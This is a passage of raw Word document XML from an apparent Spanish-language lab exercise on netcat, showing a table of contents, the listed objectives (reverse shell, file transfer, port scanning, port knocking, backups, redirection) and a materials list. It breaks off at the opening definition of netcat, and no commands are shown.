              <w:instrText xml:space="preserve"> PAGEREF _Toc182474737 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B4D5C37" w14:textId="498C74ED" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474738" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Netcat como agente de copias de seguridad</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474738 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71D79068" w14:textId="10C3EFA6" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474739" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Redirección con netcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474739 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75CBCB3B" w14:textId="1FDA73E6" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474740" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bibliografía</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474740 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3042A267" w14:textId="540908F0" w:rsidR="00CA7704" w:rsidRDefault="00CA7704">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="76BE7FF8" w14:textId="5CF27A0A" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="00CA7704"/>
    <w:p w14:paraId="5D40A88C" w14:textId="2E81E50F" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="483D2C18" w14:textId="23453D7C" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="32547126" w14:textId="13789235" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="138DB241" w14:textId="4B9776C8" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="0CB4BCB6" w14:textId="45DBF722" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="20E63D6B" w14:textId="6A57A99F" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="40132BC7" w14:textId="5E2C2CBC" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="5FBD2068" w14:textId="77777777" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00CA7704"/>
    <w:p w14:paraId="4F566E8E" w14:textId="4A4C935F" w:rsidR="007F7233" w:rsidRDefault="00D1470E" w:rsidP="004322E5">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc182474722"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Objetivo de la práctica</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="40336772" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRDefault="009D36BA" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D36BA">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">In this practice we will see what "Netcat" is and how to install netcat on </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Instalar_netcat_en" w:history="1">
        <w:r w:rsidRPr="009D36BA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Ubuntu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D36BA">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Instalar_netcat_en_1" w:history="1">
        <w:r w:rsidRPr="009D36BA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D36BA">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. We'll also look at some of the most common uses of netcat such as</w:t>
      </w:r>
      <w:r w:rsidR="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA4397" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Reverse_Shell_con" w:history="1">
        <w:r w:rsidR="009D36BA" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Reverse Shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E1B1E" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Netcat_como_chat" w:history="1">
        <w:r w:rsidR="009D36BA" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Chat between two teams</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7313DC8A" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Transferir_archivos_de" w:history="1">
        <w:r w:rsidR="009D36BA" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Transfer files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEEF7E2" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Escaneo_de_puertos" w:history="1">
        <w:r w:rsidR="009D36BA" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Port</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D36BA" w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Escaneo_de_puertos" w:history="1">
        <w:r w:rsidR="009D36BA" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Scanning</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA9F61" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Netcat_para_Port" w:history="1">
        <w:r w:rsidR="009D36BA" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Port Knocking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEB4A0" w14:textId="20585CB7" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="00493D3A" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="_Usar_" w:history="1">
        <w:r w:rsidR="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>T</w:t>
        </w:r>
        <w:r w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>imeouts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C3F84B" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Usar_UDP_en" w:history="1">
        <w:r w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Use UDP for the connection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B333377" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRPr="004D3B1B" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Impedir_que_el" w:history="1">
        <w:r w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Remove the shutdown on the server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B467D95" w14:textId="0EDEABCA" w:rsidR="00CA7704" w:rsidRPr="00BC32EF" w:rsidRDefault="001B6FA2" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Retrasar_que_el" w:history="1">
        <w:r w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>D</w:t>
        </w:r>
        <w:r w:rsidR="00515EC5" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>elay the EOF</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00515EC5" w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F711D08" w14:textId="000A035D" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Netcat_como_agente" w:history="1">
        <w:r w:rsidRPr="00BC32EF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Backups</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2FA7AE" w14:textId="56328EC2" w:rsidR="00EC383F" w:rsidRDefault="00EC383F" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:anchor="_Netcat_como_redirector" w:history="1">
        <w:r w:rsidRPr="00EC383F">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Redirection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FAC721" w14:textId="77777777" w:rsidR="00EC383F" w:rsidRDefault="00EC383F" w:rsidP="004D3B1B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F593928" w14:textId="77777777" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="009E303F"/>
    <w:p w14:paraId="32D4C9C6" w14:textId="77777777" w:rsidR="007F7233" w:rsidRDefault="00D1470E" w:rsidP="004322E5">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc182474723"/>
      <w:r>
        <w:t>Inventario de material</w:t>
      </w:r>
      <w:r w:rsidR="004322E5">
        <w:t xml:space="preserve"> necesario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="72A7AE91" w14:textId="77777777" w:rsidR="009D36BA" w:rsidRDefault="009D36BA" w:rsidP="009D36BA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Ubuntu operating system (with internet connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0F633" w14:textId="77777777" w:rsidR="009D36BA" w:rsidRDefault="009D36BA" w:rsidP="009D36BA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Windows operating system (with internet connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251D061" w14:textId="5A929419" w:rsidR="009D36BA" w:rsidRPr="001B6FA2" w:rsidRDefault="009D36BA" w:rsidP="009D36BA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009D36BA">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Optional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Have </w:t>
      </w:r>
      <w:r w:rsidR="001B6FA2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed on Windows with the Ncat feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444861F1" w14:textId="03F965A8" w:rsidR="001B6FA2" w:rsidRPr="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="009D36BA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004D3B1B" w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Reference documents to get the job done)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FBCEDB" w14:textId="70BE194A" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="47DD1CBA" w14:textId="08A3D454" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="10155C4E" w14:textId="71D00849" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="54DADC8B" w14:textId="48FFCD7C" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="187AF4B4" w14:textId="4DCFADB5" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="3347D01F" w14:textId="398CC1E1" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="67F6A19D" w14:textId="15DB59AA" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="1B0B9B56" w14:textId="53769AB3" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="08199A4D" w14:textId="1295A992" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="1297026F" w14:textId="06548350" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="733E3C5F" w14:textId="419EA2F4" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="7DDE4C45" w14:textId="7D6BFED4" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="331C0646" w14:textId="323EF034" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="3391C944" w14:textId="67BD8C3A" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="6DB980FB" w14:textId="0D000C76" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="55EAB59D" w14:textId="2AC3C3C3" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="3339E51C" w14:textId="0E199FA2" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="080DC63F" w14:textId="3F10D65F" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="03FCC944" w14:textId="46135359" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="6E715F8F" w14:textId="652B25E9" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="435A3ABB" w14:textId="6CCB154A" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="6935E337" w14:textId="212EC563" w:rsidR="001B6FA2" w:rsidRPr="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc182474724"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="004322E5">
        <w:t>jecución</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6D3CFB9A" w14:textId="52165978" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="00CA7704">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc182474725"/>
      <w:r>
        <w:t>¿Qué es netcat?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="729ABFEB" w14:textId="77777777" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="00CA7704">
      <w:r>
        <w:t xml:space="preserve">Netcat es una herramienta que se usa en la CLI y sirve para realizar varias tareas en la red. </w:t>
      </w:r>
    </w:p>
